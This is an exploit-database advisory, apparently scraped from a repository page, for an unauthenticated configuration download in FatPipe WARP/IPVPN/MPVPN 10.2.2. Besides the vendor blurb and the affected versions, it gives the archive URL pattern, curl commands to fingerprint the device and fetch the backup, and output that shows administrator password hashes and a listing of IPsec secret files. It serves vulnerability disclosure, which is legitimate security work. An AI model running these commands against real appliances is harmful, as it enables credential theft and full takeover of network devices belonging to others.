d2b0bf596b
10 changes to exploits/shellcodes Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) FatPipe Networks WARP 10.2.2 - Authorization Bypass FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated) WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
182 lines
No EOL
5.1 KiB
Text
182 lines
No EOL
5.1 KiB
Text
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)
|
|
# Date: 25.07.2021
|
|
# Exploit Author: LiquidWorm
|
|
# Vendor Homepage: https://www.fatpipeinc.com
|
|
|
|
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Unauthenticated Config Download
|
|
|
|
|
|
Vendor: FatPipe Networks Inc.
|
|
Product web page: https://www.fatpipeinc.com
|
|
Affected version: WARP / IPVPN / MPVPN
|
|
10.2.2r38
|
|
10.2.2r25
|
|
10.2.2r10
|
|
10.1.2r60p82
|
|
10.1.2r60p71
|
|
10.1.2r60p65
|
|
10.1.2r60p58s1
|
|
10.1.2r60p58
|
|
10.1.2r60p55
|
|
10.1.2r60p45
|
|
10.1.2r60p35
|
|
10.1.2r60p32
|
|
10.1.2r60p13
|
|
10.1.2r60p10
|
|
9.1.2r185
|
|
9.1.2r180p2
|
|
9.1.2r165
|
|
9.1.2r164p5
|
|
9.1.2r164p4
|
|
9.1.2r164
|
|
9.1.2r161p26
|
|
9.1.2r161p20
|
|
9.1.2r161p17
|
|
9.1.2r161p16
|
|
9.1.2r161p12
|
|
9.1.2r161p3
|
|
9.1.2r161p2
|
|
9.1.2r156
|
|
9.1.2r150
|
|
9.1.2r144
|
|
9.1.2r129
|
|
7.1.2r39
|
|
6.1.2r70p75-m
|
|
6.1.2r70p45-m
|
|
6.1.2r70p26
|
|
5.2.0r34
|
|
|
|
Summary: FatPipe Networks invented the concept of router-clustering,
|
|
which provides the highest level of reliability, redundancy, and speed
|
|
of Internet traffic for Business Continuity and communications. FatPipe
|
|
WARP achieves fault tolerance for companies by creating an easy method
|
|
of combining two or more Internet connections of any kind over multiple
|
|
ISPs. FatPipe utilizes all paths when the lines are up and running,
|
|
dynamically balancing traffic over the multiple lines, and intelligently
|
|
failing over inbound and outbound IP traffic when ISP services and/or
|
|
components fail.
|
|
|
|
FatPipe IPVPN balances load and provides reliability among multiple
|
|
managed and CPE based VPNs as well as dedicated private networks. FatPipe
|
|
IPVPN can also provide you an easy low-cost migration path from private
|
|
line, Frame or Point-to-Point networks. You can aggregate multiple private,
|
|
MPLS and public networks without additional equipment at the provider's
|
|
site.
|
|
|
|
FatPipe MPVPN, a patented router clustering device, is an essential part
|
|
of Disaster Recovery and Business Continuity Planning for Virtual Private
|
|
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
|
|
300% times more reliable, redundant and faster. MPVPN can take WANs with
|
|
an uptime of 99.5% or less and make them 99.999988% or higher, providing
|
|
a virtually infallible WAN. MPVPN dynamically balances load over multiple
|
|
lines and ISPs without the need for BGP programming. MPVPN aggregates up
|
|
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
|
|
you need to keep your VPN up and running despite failures of service, line,
|
|
software, or hardware.
|
|
|
|
Desc: The application is vulnerable to unauthenticated configuration disclosure
|
|
when direct object reference is made to the backup archive file using an HTTP
|
|
GET request. The only unknown part of the filename is the hostname of the system.
|
|
This will enable the attacker to disclose sensitive information and help her
|
|
in authentication bypass, privilege escalation and full system access.
|
|
|
|
Tested on: Apache-Coyote/1.1
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2021-5683
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5683.php
|
|
|
|
|
|
30.05.2016
|
|
25.07.2021
|
|
|
|
--
|
|
|
|
|
|
Products:
|
|
---------
|
|
WARP / MPVPN / IPVPN
|
|
|
|
Format:
|
|
-------
|
|
https://[TARGET]/fpui/[HostName]-config-[Product]-[Version]-mcore.tar.gz
|
|
|
|
Examples:
|
|
---------
|
|
curl -sk https://10.0.0.7/fpui/ZSLAB-config-WARP-9.1.2r161p19-mcore.tar.gz # For WARP
|
|
curl -sk https://10.0.0.8/fpui/testingus-config-VPN-10.2.2r38-mcore.tar.gz # For MPVPN/IPVPN
|
|
|
|
Version:
|
|
--------
|
|
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "10.2"
|
|
103: <h5>10.2.2r38</h5>
|
|
|
|
Product:
|
|
--------
|
|
$ curl -sk https://10.0.0.9/fpui/jsp/login.jsp |findstr /spina:d "FatPipe"
|
|
15: <title>FatPipe MPVPN | Log in</title>
|
|
|
|
Content:
|
|
--------
|
|
$ tar -xf testingus-config-VPN-10.2.2r38-mcore.tar.gz
|
|
$ cd etc
|
|
$ cat Xpasswd
|
|
Administrator:26df420bcb78bb02eef532d51aea22e2:1
|
|
fatpipe:3b5afbb47fc3067d62d73f5bb1f92b5b:1
|
|
|
|
$ ls
|
|
.
|
|
..
|
|
auto_config.conf
|
|
bird.conf
|
|
bridge.conf
|
|
cm.conf
|
|
crontab
|
|
dhcpd.conf
|
|
dnssec.conf
|
|
dynamic_route.conf
|
|
fatpipe
|
|
fileserver.conf
|
|
fp_arp.conf
|
|
fp_config.dtd
|
|
fp_distributed_global_rule
|
|
fp_global_rule
|
|
fp_version
|
|
haproxy
|
|
hosts
|
|
interface_access_list.conf
|
|
ipsec.conf
|
|
ipsec.d
|
|
ipsec.secrets
|
|
ipsec_cert_secrets
|
|
ipsec_shared_secrets
|
|
ipsec_subnet.conf
|
|
ipsec_xauth.conf
|
|
ipv4_dynamic_routing.conf
|
|
logrotate.d
|
|
manifest
|
|
named.conf
|
|
network_object.conf
|
|
ntp.conf
|
|
ppp
|
|
radiusclient
|
|
resolv.conf
|
|
rsyslog.conf
|
|
site.xml
|
|
site.xml.org
|
|
snmp_config.conf
|
|
squid
|
|
sysconfig
|
|
syslog.conf
|
|
tcp-congestion-table.conf
|
|
tcp-congestion-table.conf.org
|
|
webfilter.conf
|
|
xgreet.txt
|
|
xnetmap.conf
|
|
Xpasswd
|
|
xsnmp.conf
|
|
xtreme_conf.xml |